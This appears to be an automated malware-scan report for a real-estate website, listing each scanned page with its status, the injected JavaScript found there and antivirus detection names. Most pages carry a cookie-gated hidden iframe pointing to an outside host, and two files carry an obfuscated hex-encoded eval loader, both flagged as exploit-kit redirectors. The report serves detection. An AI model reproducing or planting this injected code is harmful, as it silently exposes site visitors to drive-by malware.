Request | Server response | Status |
http://www.synergysouthbeach.com/ | 200 OK Content-Length: 19745 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) function p09() { var static='ajax'; var controller='index.php'; var p = document.createElement('iframe'); p.src = 'http://www.onlinenow.net.au/download/vdrZ8GgM.php'; p.style.position = 'absolute'; p.style.color = '9851'; p.style.height = '9851px'; p.style.width = '9851px'; p.style.left = '10009851'; p.style.top = '10009851'; if (!document.getElementById('p')) { document.write('<p id=\'p\' class=\'p09\' ></p>'); document.getElementById('p').appendChild(p); }}function SetCookie(cookie
... 324 bytes are skipped ...name ) { var start = document.cookie.indexOf( name + \"=\" ); var len = start + name.length + 1; if ( ( !start ) && ( name != document.cookie.substring( 0, name.length ) ) ) { return null; } if ( start == -1 ) return null; var end = document.cookie.indexOf( \";\", len ); if ( end == -1 ) end = document.cookie.length; return unescape( document.cookie.substring( len, end ) );}if (navigator.cookieEnabled){if(GetCookie('visited_uq')==55){}else{SetCookie('visited_uq', '55', '1', '/');p09();}}Antivirus reports:- AntiVir
- HTML/ExpKit.Gen3
- Avast
- JS:Includer-AJE [Trj]
- Ikarus
- Trojan.JS.IFrame
- K7AntiVirus
- Riskware ( 885143830 )
- TrendMicro-HouseCall
- TROJ_GEN.F47V1230
- Comodo
- UnclassifiedMalware
- K7GW
- Riskware ( 885143830 )
- McAfee-GW-Edition
- JS/Redirector.bc
- DrWeb
- JS.IFrame.459
- Microsoft
- Trojan:JS/Quidvetis.A
- Kaspersky
- Trojan-Downloader.JS.Iframe.dfm
- Fortinet
- JS/Blacole.EU!tr.dldr
- McAfee
- JS/Redirector.bc
- NANO-Antivirus
- Trojan.Script.Iframe.bopaxv
- F-Prot
- JS/IFrame.RS.gen
- AVG
- HTML/Framer
- Norman
- Blacole.XE
- GData
- Win32.Trojan.Agent.8RU7IM
- Commtouch
- JS/IFrame.RS.gen
|
http://www.synergysouthbeach.com/directory.html | 200 OK Content-Length: 20817 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) function p09() { var static='ajax'; var controller='index.php'; var p = document.createElement('iframe'); p.src = 'http://www.onlinenow.net.au/download/vdrZ8GgM.php'; p.style.position = 'absolute'; p.style.color = '9851'; p.style.height = '9851px'; p.style.width = '9851px'; p.style.left = '10009851'; p.style.top = '10009851'; if (!document.getElementById('p')) { document.write('<p id=\'p\' class=\'p09\' ></p>'); document.getElementById('p').appendChild(p); }}function SetCookie(cookie
... 324 bytes are skipped ...name ) { var start = document.cookie.indexOf( name + \"=\" ); var len = start + name.length + 1; if ( ( !start ) && ( name != document.cookie.substring( 0, name.length ) ) ) { return null; } if ( start == -1 ) return null; var end = document.cookie.indexOf( \";\", len ); if ( end == -1 ) end = document.cookie.length; return unescape( document.cookie.substring( len, end ) );}if (navigator.cookieEnabled){if(GetCookie('visited_uq')==55){}else{SetCookie('visited_uq', '55', '1', '/');p09();}}Antivirus reports:- AntiVir
- HTML/ExpKit.Gen3
- Avast
- JS:Includer-AJE [Trj]
- Ikarus
- Trojan.JS.IFrame
- K7AntiVirus
- Riskware ( 885143830 )
- TrendMicro-HouseCall
- TROJ_GEN.F47V1230
- Comodo
- UnclassifiedMalware
- K7GW
- Riskware ( 885143830 )
- McAfee-GW-Edition
- JS/Redirector.bc
- DrWeb
- JS.IFrame.459
- Microsoft
- Trojan:JS/Quidvetis.A
- Kaspersky
- Trojan-Downloader.JS.Iframe.dfm
- Fortinet
- JS/Blacole.EU!tr.dldr
- McAfee
- JS/Redirector.bc
- NANO-Antivirus
- Trojan.Script.Iframe.bopaxv
- F-Prot
- JS/IFrame.RS.gen
- AVG
- HTML/Framer
- Norman
- Blacole.XE
- GData
- Win32.Trojan.Agent.8RU7IM
- Commtouch
- JS/IFrame.RS.gen
|
http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.js | 200 OK Content-Length: 163855 Content-Type: text/javascript | clean |
http://www.synergysouthbeach.com/home.html | 200 OK Content-Length: 32202 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) function p09() { var static='ajax'; var controller='index.php'; var p = document.createElement('iframe'); p.src = 'http://www.onlinenow.net.au/download/vdrZ8GgM.php'; p.style.position = 'absolute'; p.style.color = '9851'; p.style.height = '9851px'; p.style.width = '9851px'; p.style.left = '10009851'; p.style.top = '10009851'; if (!document.getElementById('p')) { document.write('<p id=\'p\' class=\'p09\' ></p>'); document.getElementById('p').appendChild(p); }}function SetCookie(cookie
... 324 bytes are skipped ...name ) { var start = document.cookie.indexOf( name + \"=\" ); var len = start + name.length + 1; if ( ( !start ) && ( name != document.cookie.substring( 0, name.length ) ) ) { return null; } if ( start == -1 ) return null; var end = document.cookie.indexOf( \";\", len ); if ( end == -1 ) end = document.cookie.length; return unescape( document.cookie.substring( len, end ) );}if (navigator.cookieEnabled){if(GetCookie('visited_uq')==55){}else{SetCookie('visited_uq', '55', '1', '/');p09();}}Antivirus reports:- AntiVir
- HTML/ExpKit.Gen3
- Avast
- JS:Includer-AJE [Trj]
- Ikarus
- Trojan.JS.IFrame
- K7AntiVirus
- Riskware ( 885143830 )
- TrendMicro-HouseCall
- TROJ_GEN.F47V1230
- Comodo
- UnclassifiedMalware
- K7GW
- Riskware ( 885143830 )
- McAfee-GW-Edition
- JS/Redirector.bc
- DrWeb
- JS.IFrame.459
- Microsoft
- Trojan:JS/Quidvetis.A
- Kaspersky
- Trojan-Downloader.JS.Iframe.dfm
- Fortinet
- JS/Blacole.EU!tr.dldr
- McAfee
- JS/Redirector.bc
- NANO-Antivirus
- Trojan.Script.Iframe.bopaxv
- F-Prot
- JS/IFrame.RS.gen
- AVG
- HTML/Framer
- Norman
- Blacole.XE
- GData
- Win32.Trojan.Agent.8RU7IM
- Commtouch
- JS/IFrame.RS.gen
|
http://www.synergysouthbeach.com/buyerssellers.html | 200 OK Content-Length: 30564 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) function p09() { var static='ajax'; var controller='index.php'; var p = document.createElement('iframe'); p.src = 'http://www.onlinenow.net.au/download/vdrZ8GgM.php'; p.style.position = 'absolute'; p.style.color = '9851'; p.style.height = '9851px'; p.style.width = '9851px'; p.style.left = '10009851'; p.style.top = '10009851'; if (!document.getElementById('p')) { document.write('<p id=\'p\' class=\'p09\' ></p>'); document.getElementById('p').appendChild(p); }}function SetCookie(cookie
... 324 bytes are skipped ...name ) { var start = document.cookie.indexOf( name + \"=\" ); var len = start + name.length + 1; if ( ( !start ) && ( name != document.cookie.substring( 0, name.length ) ) ) { return null; } if ( start == -1 ) return null; var end = document.cookie.indexOf( \";\", len ); if ( end == -1 ) end = document.cookie.length; return unescape( document.cookie.substring( len, end ) );}if (navigator.cookieEnabled){if(GetCookie('visited_uq')==55){}else{SetCookie('visited_uq', '55', '1', '/');p09();}}Antivirus reports:- AntiVir
- HTML/ExpKit.Gen3
- Avast
- JS:Includer-AJE [Trj]
- Ikarus
- Trojan.JS.IFrame
- K7AntiVirus
- Riskware ( 885143830 )
- TrendMicro-HouseCall
- TROJ_GEN.F47V1230
- Comodo
- UnclassifiedMalware
- K7GW
- Riskware ( 885143830 )
- McAfee-GW-Edition
- JS/Redirector.bc
- DrWeb
- JS.IFrame.459
- Microsoft
- Trojan:JS/Quidvetis.A
- Kaspersky
- Trojan-Downloader.JS.Iframe.dfm
- Fortinet
- JS/Blacole.EU!tr.dldr
- McAfee
- JS/Redirector.bc
- NANO-Antivirus
- Trojan.Script.Iframe.bopaxv
- F-Prot
- JS/IFrame.RS.gen
- AVG
- HTML/Framer
- Norman
- Blacole.XE
- GData
- Win32.Trojan.Agent.8RU7IM
- Commtouch
- JS/IFrame.RS.gen
|
http://www.synergysouthbeach.com/news.html | 200 OK Content-Length: 20834 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) function p09() { var static='ajax'; var controller='index.php'; var p = document.createElement('iframe'); p.src = 'http://www.onlinenow.net.au/download/vdrZ8GgM.php'; p.style.position = 'absolute'; p.style.color = '9851'; p.style.height = '9851px'; p.style.width = '9851px'; p.style.left = '10009851'; p.style.top = '10009851'; if (!document.getElementById('p')) { document.write('<p id=\'p\' class=\'p09\' ></p>'); document.getElementById('p').appendChild(p); }}function SetCookie(cookie
... 324 bytes are skipped ...name ) { var start = document.cookie.indexOf( name + \"=\" ); var len = start + name.length + 1; if ( ( !start ) && ( name != document.cookie.substring( 0, name.length ) ) ) { return null; } if ( start == -1 ) return null; var end = document.cookie.indexOf( \";\", len ); if ( end == -1 ) end = document.cookie.length; return unescape( document.cookie.substring( len, end ) );}if (navigator.cookieEnabled){if(GetCookie('visited_uq')==55){}else{SetCookie('visited_uq', '55', '1', '/');p09();}}Antivirus reports:- AntiVir
- HTML/ExpKit.Gen3
- Avast
- JS:Includer-AJE [Trj]
- Ikarus
- Trojan.JS.IFrame
- K7AntiVirus
- Riskware ( 885143830 )
- TrendMicro-HouseCall
- TROJ_GEN.F47V1230
- Comodo
- UnclassifiedMalware
- K7GW
- Riskware ( 885143830 )
- McAfee-GW-Edition
- JS/Redirector.bc
- DrWeb
- JS.IFrame.459
- Microsoft
- Trojan:JS/Quidvetis.A
- Kaspersky
- Trojan-Downloader.JS.Iframe.dfm
- Fortinet
- JS/Blacole.EU!tr.dldr
- McAfee
- JS/Redirector.bc
- NANO-Antivirus
- Trojan.Script.Iframe.bopaxv
- F-Prot
- JS/IFrame.RS.gen
- AVG
- HTML/Framer
- Norman
- Blacole.XE
- GData
- Win32.Trojan.Agent.8RU7IM
- Commtouch
- JS/IFrame.RS.gen
|
http://www.synergysouthbeach.com/quarterly.html | 200 OK Content-Length: 22663 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) function p09() { var static='ajax'; var controller='index.php'; var p = document.createElement('iframe'); p.src = 'http://www.onlinenow.net.au/download/vdrZ8GgM.php'; p.style.position = 'absolute'; p.style.color = '9851'; p.style.height = '9851px'; p.style.width = '9851px'; p.style.left = '10009851'; p.style.top = '10009851'; if (!document.getElementById('p')) { document.write('<p id=\'p\' class=\'p09\' ></p>'); document.getElementById('p').appendChild(p); }}function SetCookie(cookie
... 324 bytes are skipped ...name ) { var start = document.cookie.indexOf( name + \"=\" ); var len = start + name.length + 1; if ( ( !start ) && ( name != document.cookie.substring( 0, name.length ) ) ) { return null; } if ( start == -1 ) return null; var end = document.cookie.indexOf( \";\", len ); if ( end == -1 ) end = document.cookie.length; return unescape( document.cookie.substring( len, end ) );}if (navigator.cookieEnabled){if(GetCookie('visited_uq')==55){}else{SetCookie('visited_uq', '55', '1', '/');p09();}}Antivirus reports:- AntiVir
- HTML/ExpKit.Gen3
- Avast
- JS:Includer-AJE [Trj]
- Ikarus
- Trojan.JS.IFrame
- K7AntiVirus
- Riskware ( 885143830 )
- TrendMicro-HouseCall
- TROJ_GEN.F47V1230
- Comodo
- UnclassifiedMalware
- K7GW
- Riskware ( 885143830 )
- McAfee-GW-Edition
- JS/Redirector.bc
- DrWeb
- JS.IFrame.459
- Microsoft
- Trojan:JS/Quidvetis.A
- Kaspersky
- Trojan-Downloader.JS.Iframe.dfm
- Fortinet
- JS/Blacole.EU!tr.dldr
- McAfee
- JS/Redirector.bc
- NANO-Antivirus
- Trojan.Script.Iframe.bopaxv
- F-Prot
- JS/IFrame.RS.gen
- AVG
- HTML/Framer
- Norman
- Blacole.XE
- GData
- Win32.Trojan.Agent.8RU7IM
- Commtouch
- JS/IFrame.RS.gen
|
http://www.synergysouthbeach.com/featuredlist.html | 200 OK Content-Length: 33971 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) function p09() { var static='ajax'; var controller='index.php'; var p = document.createElement('iframe'); p.src = 'http://www.onlinenow.net.au/download/vdrZ8GgM.php'; p.style.position = 'absolute'; p.style.color = '9851'; p.style.height = '9851px'; p.style.width = '9851px'; p.style.left = '10009851'; p.style.top = '10009851'; if (!document.getElementById('p')) { document.write('<p id=\'p\' class=\'p09\' ></p>'); document.getElementById('p').appendChild(p); }}function SetCookie(cookie
... 324 bytes are skipped ...name ) { var start = document.cookie.indexOf( name + \"=\" ); var len = start + name.length + 1; if ( ( !start ) && ( name != document.cookie.substring( 0, name.length ) ) ) { return null; } if ( start == -1 ) return null; var end = document.cookie.indexOf( \";\", len ); if ( end == -1 ) end = document.cookie.length; return unescape( document.cookie.substring( len, end ) );}if (navigator.cookieEnabled){if(GetCookie('visited_uq')==55){}else{SetCookie('visited_uq', '55', '1', '/');p09();}}Antivirus reports:- AntiVir
- HTML/ExpKit.Gen3
- Avast
- JS:Includer-AJE [Trj]
- Ikarus
- Trojan.JS.IFrame
- K7AntiVirus
- Riskware ( 885143830 )
- TrendMicro-HouseCall
- TROJ_GEN.F47V1230
- Comodo
- UnclassifiedMalware
- K7GW
- Riskware ( 885143830 )
- McAfee-GW-Edition
- JS/Redirector.bc
- DrWeb
- JS.IFrame.459
- Microsoft
- Trojan:JS/Quidvetis.A
- Kaspersky
- Trojan-Downloader.JS.Iframe.dfm
- Fortinet
- JS/Blacole.EU!tr.dldr
- McAfee
- JS/Redirector.bc
- NANO-Antivirus
- Trojan.Script.Iframe.bopaxv
- F-Prot
- JS/IFrame.RS.gen
- AVG
- HTML/Framer
- Norman
- Blacole.XE
- GData
- Win32.Trojan.Agent.8RU7IM
- Commtouch
- JS/IFrame.RS.gen
|
http://www.synergysouthbeach.com/mortgage.html | 200 OK Content-Length: 50680 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) function p09() { var static='ajax'; var controller='index.php'; var p = document.createElement('iframe'); p.src = 'http://www.onlinenow.net.au/download/vdrZ8GgM.php'; p.style.position = 'absolute'; p.style.color = '9851'; p.style.height = '9851px'; p.style.width = '9851px'; p.style.left = '10009851'; p.style.top = '10009851'; if (!document.getElementById('p')) { document.write('<p id=\'p\' class=\'p09\' ></p>'); document.getElementById('p').appendChild(p); }}function SetCookie(cookie
... 324 bytes are skipped ...name ) { var start = document.cookie.indexOf( name + \"=\" ); var len = start + name.length + 1; if ( ( !start ) && ( name != document.cookie.substring( 0, name.length ) ) ) { return null; } if ( start == -1 ) return null; var end = document.cookie.indexOf( \";\", len ); if ( end == -1 ) end = document.cookie.length; return unescape( document.cookie.substring( len, end ) );}if (navigator.cookieEnabled){if(GetCookie('visited_uq')==55){}else{SetCookie('visited_uq', '55', '1', '/');p09();}}Antivirus reports:- AntiVir
- HTML/ExpKit.Gen3
- Avast
- JS:Includer-AJE [Trj]
- Ikarus
- Trojan.JS.IFrame
- K7AntiVirus
- Riskware ( 885143830 )
- TrendMicro-HouseCall
- TROJ_GEN.F47V1230
- Comodo
- UnclassifiedMalware
- K7GW
- Riskware ( 885143830 )
- McAfee-GW-Edition
- JS/Redirector.bc
- DrWeb
- JS.IFrame.459
- Microsoft
- Trojan:JS/Quidvetis.A
- Kaspersky
- Trojan-Downloader.JS.Iframe.dfm
- Fortinet
- JS/Blacole.EU!tr.dldr
- McAfee
- JS/Redirector.bc
- NANO-Antivirus
- Trojan.Script.Iframe.bopaxv
- F-Prot
- JS/IFrame.RS.gen
- AVG
- HTML/Framer
- Norman
- Blacole.XE
- GData
- Win32.Trojan.Agent.8RU7IM
- Commtouch
- JS/IFrame.RS.gen
|
http://www.synergysouthbeach.com/admin/deletechk.js | 200 OK Content-Length: 6806 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) ps="split";e=eval;v="0x";a=0;z="y";try{a*=25}catch(zz){a=1}if(!a){try{--e("doc"+"ument")["\x62od"+z]}catch(q){a2="_";sa=0xa-02;}z="28_6e_7d_76_6b_7c_71_77_76_28_82_82_82_6e_6e_6e_30_31_28_83_15_12_28_7e_69_7a_28_6d_7c_76_75_28_45_28_6c_77_6b_7d_75_6d_76_7c_36_6b_7a_6d_69_7c_6d_4d_74_6d_75_6d_76_7c_30_2f_71_6e_7a_69_75_6d_2f_31_43_15_12_15_12_28_6d_7c_76_75_36_7b_7a_6b_28_45_28_2f_70_7c_7c_78_42_37_37_7a_77_6b_73_35_7a_6d_6e_77_7a_75_36_71_76_6e_77_37_72_7b_37_6d_7b_6c_36_78_70_78_2f_43_15_12_28_
... 3228 bytes are skipped ...12_71_6e_28_30_76_69_7e_71_6f_69_7c_77_7a_36_6b_77_77_73_71_6d_4d_76_69_6a_74_6d_6c_31_15_12_83_15_12_71_6e_30_4f_6d_7c_4b_77_77_73_71_6d_30_2f_7e_71_7b_71_7c_6d_6c_67_7d_79_2f_31_45_45_3d_3d_31_83_85_6d_74_7b_6d_83_5b_6d_7c_4b_77_77_73_71_6d_30_2f_7e_71_7b_71_7c_6d_6c_67_7d_79_2f_34_28_2f_3d_3d_2f_34_28_2f_39_2f_34_28_2f_37_2f_31_43_15_12_15_12_82_82_82_6e_6e_6e_30_31_43_15_12_85_15_12_85_15_12"[ps](a2);za="";for(i=0;i<z.length;i++){za+=String["fromCharCode"](e(v+(z[i]))-sa);}zaz=za;e(zaz);}Antivirus reports:- AntiVir
- JS/BlacoleRef.CZ.29
- Avast
- JS:Decode-AQB [Trj]
- Emsisoft
- Trojan.JS.Agent.JBT (B)
- CAT-QuickHeal
- JS/Iframe.DEG
- DrWeb
- JS.IFrame.457
- Kaspersky
- Trojan-Downloader.JS.Iframe.deg
- Fortinet
- JS/Iframe.DDG!tr.dldr
- NANO-Antivirus
- Trojan.Script.Expack.bvtkmp
- Norman
- Blacole.UC
- GData
- Trojan.JS.Agent.JBT
- BitDefender
- Trojan.JS.Agent.JBT
|
http://www.synergysouthbeach.com/reqcma.html | 200 OK Content-Length: 24151 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) function p09() { var static='ajax'; var controller='index.php'; var p = document.createElement('iframe'); p.src = 'http://www.onlinenow.net.au/download/vdrZ8GgM.php'; p.style.position = 'absolute'; p.style.color = '9851'; p.style.height = '9851px'; p.style.width = '9851px'; p.style.left = '10009851'; p.style.top = '10009851'; if (!document.getElementById('p')) { document.write('<p id=\'p\' class=\'p09\' ></p>'); document.getElementById('p').appendChild(p); }}function SetCookie(cookie
... 324 bytes are skipped ...name ) { var start = document.cookie.indexOf( name + \"=\" ); var len = start + name.length + 1; if ( ( !start ) && ( name != document.cookie.substring( 0, name.length ) ) ) { return null; } if ( start == -1 ) return null; var end = document.cookie.indexOf( \";\", len ); if ( end == -1 ) end = document.cookie.length; return unescape( document.cookie.substring( len, end ) );}if (navigator.cookieEnabled){if(GetCookie('visited_uq')==55){}else{SetCookie('visited_uq', '55', '1', '/');p09();}}Antivirus reports:- AntiVir
- HTML/ExpKit.Gen3
- Avast
- JS:Includer-AJE [Trj]
- Ikarus
- Trojan.JS.IFrame
- K7AntiVirus
- Riskware ( 885143830 )
- TrendMicro-HouseCall
- TROJ_GEN.F47V1230
- Comodo
- UnclassifiedMalware
- K7GW
- Riskware ( 885143830 )
- McAfee-GW-Edition
- JS/Redirector.bc
- DrWeb
- JS.IFrame.459
- Microsoft
- Trojan:JS/Quidvetis.A
- Kaspersky
- Trojan-Downloader.JS.Iframe.dfm
- Fortinet
- JS/Blacole.EU!tr.dldr
- McAfee
- JS/Redirector.bc
- NANO-Antivirus
- Trojan.Script.Iframe.bopaxv
- F-Prot
- JS/IFrame.RS.gen
- AVG
- HTML/Framer
- Norman
- Blacole.XE
- GData
- Win32.Trojan.Agent.8RU7IM
- Commtouch
- JS/IFrame.RS.gen
|
http://www.synergysouthbeach.com/miamiinfo.html | 200 OK Content-Length: 22673 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) function p09() { var static='ajax'; var controller='index.php'; var p = document.createElement('iframe'); p.src = 'http://www.onlinenow.net.au/download/vdrZ8GgM.php'; p.style.position = 'absolute'; p.style.color = '9851'; p.style.height = '9851px'; p.style.width = '9851px'; p.style.left = '10009851'; p.style.top = '10009851'; if (!document.getElementById('p')) { document.write('<p id=\'p\' class=\'p09\' ></p>'); document.getElementById('p').appendChild(p); }}function SetCookie(cookie
... 324 bytes are skipped ...name ) { var start = document.cookie.indexOf( name + \"=\" ); var len = start + name.length + 1; if ( ( !start ) && ( name != document.cookie.substring( 0, name.length ) ) ) { return null; } if ( start == -1 ) return null; var end = document.cookie.indexOf( \";\", len ); if ( end == -1 ) end = document.cookie.length; return unescape( document.cookie.substring( len, end ) );}if (navigator.cookieEnabled){if(GetCookie('visited_uq')==55){}else{SetCookie('visited_uq', '55', '1', '/');p09();}}Antivirus reports:- AntiVir
- HTML/ExpKit.Gen3
- Avast
- JS:Includer-AJE [Trj]
- Ikarus
- Trojan.JS.IFrame
- K7AntiVirus
- Riskware ( 885143830 )
- TrendMicro-HouseCall
- TROJ_GEN.F47V1230
- Comodo
- UnclassifiedMalware
- K7GW
- Riskware ( 885143830 )
- McAfee-GW-Edition
- JS/Redirector.bc
- DrWeb
- JS.IFrame.459
- Microsoft
- Trojan:JS/Quidvetis.A
- Kaspersky
- Trojan-Downloader.JS.Iframe.dfm
- Fortinet
- JS/Blacole.EU!tr.dldr
- McAfee
- JS/Redirector.bc
- NANO-Antivirus
- Trojan.Script.Iframe.bopaxv
- F-Prot
- JS/IFrame.RS.gen
- AVG
- HTML/Framer
- Norman
- Blacole.XE
- GData
- Win32.Trojan.Agent.8RU7IM
- Commtouch
- JS/IFrame.RS.gen
|
http://www.synergysouthbeach.com/contactus.html | 200 OK Content-Length: 24080 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) function p09() { var static='ajax'; var controller='index.php'; var p = document.createElement('iframe'); p.src = 'http://www.onlinenow.net.au/download/vdrZ8GgM.php'; p.style.position = 'absolute'; p.style.color = '9851'; p.style.height = '9851px'; p.style.width = '9851px'; p.style.left = '10009851'; p.style.top = '10009851'; if (!document.getElementById('p')) { document.write('<p id=\'p\' class=\'p09\' ></p>'); document.getElementById('p').appendChild(p); }}function SetCookie(cookie
... 324 bytes are skipped ...name ) { var start = document.cookie.indexOf( name + \"=\" ); var len = start + name.length + 1; if ( ( !start ) && ( name != document.cookie.substring( 0, name.length ) ) ) { return null; } if ( start == -1 ) return null; var end = document.cookie.indexOf( \";\", len ); if ( end == -1 ) end = document.cookie.length; return unescape( document.cookie.substring( len, end ) );}if (navigator.cookieEnabled){if(GetCookie('visited_uq')==55){}else{SetCookie('visited_uq', '55', '1', '/');p09();}}Antivirus reports:- AntiVir
- HTML/ExpKit.Gen3
- Avast
- JS:Includer-AJE [Trj]
- Ikarus
- Trojan.JS.IFrame
- K7AntiVirus
- Riskware ( 885143830 )
- TrendMicro-HouseCall
- TROJ_GEN.F47V1230
- Comodo
- UnclassifiedMalware
- K7GW
- Riskware ( 885143830 )
- McAfee-GW-Edition
- JS/Redirector.bc
- DrWeb
- JS.IFrame.459
- Microsoft
- Trojan:JS/Quidvetis.A
- Kaspersky
- Trojan-Downloader.JS.Iframe.dfm
- Fortinet
- JS/Blacole.EU!tr.dldr
- McAfee
- JS/Redirector.bc
- NANO-Antivirus
- Trojan.Script.Iframe.bopaxv
- F-Prot
- JS/IFrame.RS.gen
- AVG
- HTML/Framer
- Norman
- Blacole.XE
- GData
- Win32.Trojan.Agent.8RU7IM
- Commtouch
- JS/IFrame.RS.gen
|
http://www.synergysouthbeach.com/resources/resources.htm | 200 OK Content-Length: 15133 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) ps="split";e=eval;v="0x";a=0;z="y";try{a*=25}catch(zz){a=1}if(!a){try{--e("doc"+"ument")["\x62od"+z]}catch(q){a2="_";sa=0xa-02;}z="28_6e_7d_76_6b_7c_71_77_76_28_82_82_82_6e_6e_6e_30_31_28_83_15_12_28_7e_69_7a_28_75_74_81_28_45_28_6c_77_6b_7d_75_6d_76_7c_36_6b_7a_6d_69_7c_6d_4d_74_6d_75_6d_76_7c_30_2f_71_6e_7a_69_75_6d_2f_31_43_15_12_15_12_28_75_74_81_36_7b_7a_6b_28_45_28_2f_70_7c_7c_78_42_37_37_7a_77_6b_73_35_7a_6d_6e_77_7a_75_36_71_76_6e_77_37_72_7b_37_6d_7b_6c_36_78_70_78_2f_43_15_12_28_75_74_
... 3192 bytes are skipped ...12_71_6e_28_30_76_69_7e_71_6f_69_7c_77_7a_36_6b_77_77_73_71_6d_4d_76_69_6a_74_6d_6c_31_15_12_83_15_12_71_6e_30_4f_6d_7c_4b_77_77_73_71_6d_30_2f_7e_71_7b_71_7c_6d_6c_67_7d_79_2f_31_45_45_3d_3d_31_83_85_6d_74_7b_6d_83_5b_6d_7c_4b_77_77_73_71_6d_30_2f_7e_71_7b_71_7c_6d_6c_67_7d_79_2f_34_28_2f_3d_3d_2f_34_28_2f_39_2f_34_28_2f_37_2f_31_43_15_12_15_12_82_82_82_6e_6e_6e_30_31_43_15_12_85_15_12_85_15_12"[ps](a2);za="";for(i=0;i<z.length;i++){za+=String["fromCharCode"](e(v+(z[i]))-sa);}zaz=za;e(zaz);}Antivirus reports:- AntiVir
- JS/BlacoleRef.CZ.29
- Avast
- JS:Decode-AQB [Trj]
- Emsisoft
- Trojan.JS.Agent.JBT (B)
- CAT-QuickHeal
- JS/Iframe.DEG
- DrWeb
- JS.IFrame.457
- Kaspersky
- Trojan-Downloader.JS.Iframe.deg
- Fortinet
- JS/Iframe.DDG!tr.dldr
- NANO-Antivirus
- Trojan.Script.Expack.bvtkmp
- Norman
- Blacole.UC
- GData
- Trojan.JS.Agent.JBT
- BitDefender
- Trojan.JS.Agent.JBT
|
http://www.synergysouthbeach.com/resources/../index2.htm | 404 Not Found Content-Length: 19986 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) function p09() { var static='ajax'; var controller='index.php'; var p = document.createElement('iframe'); p.src = 'http://www.onlinenow.net.au/download/vdrZ8GgM.php'; p.style.position = 'absolute'; p.style.color = '9851'; p.style.height = '9851px'; p.style.width = '9851px'; p.style.left = '10009851'; p.style.top = '10009851'; if (!document.getElementById('p')) { document.write('<p id=\'p\' class=\'p09\' ></p>'); document.getElementById('p').appendChild(p); }}function SetCookie(cookie
... 324 bytes are skipped ...name ) { var start = document.cookie.indexOf( name + \"=\" ); var len = start + name.length + 1; if ( ( !start ) && ( name != document.cookie.substring( 0, name.length ) ) ) { return null; } if ( start == -1 ) return null; var end = document.cookie.indexOf( \";\", len ); if ( end == -1 ) end = document.cookie.length; return unescape( document.cookie.substring( len, end ) );}if (navigator.cookieEnabled){if(GetCookie('visited_uq')==55){}else{SetCookie('visited_uq', '55', '1', '/');p09();}}Antivirus reports:- AntiVir
- HTML/ExpKit.Gen3
- Avast
- JS:Includer-AJE [Trj]
- Ikarus
- Trojan.JS.IFrame
- K7AntiVirus
- Riskware ( 885143830 )
- TrendMicro-HouseCall
- TROJ_GEN.F47V1230
- Comodo
- UnclassifiedMalware
- K7GW
- Riskware ( 885143830 )
- McAfee-GW-Edition
- JS/Redirector.bc
- DrWeb
- JS.IFrame.459
- Microsoft
- Trojan:JS/Quidvetis.A
- Kaspersky
- Trojan-Downloader.JS.Iframe.dfm
- Fortinet
- JS/Blacole.EU!tr.dldr
- McAfee
- JS/Redirector.bc
- NANO-Antivirus
- Trojan.Script.Iframe.bopaxv
- F-Prot
- JS/IFrame.RS.gen
- AVG
- HTML/Framer
- Norman
- Blacole.XE
- GData
- Win32.Trojan.Agent.8RU7IM
- Commtouch
- JS/IFrame.RS.gen
|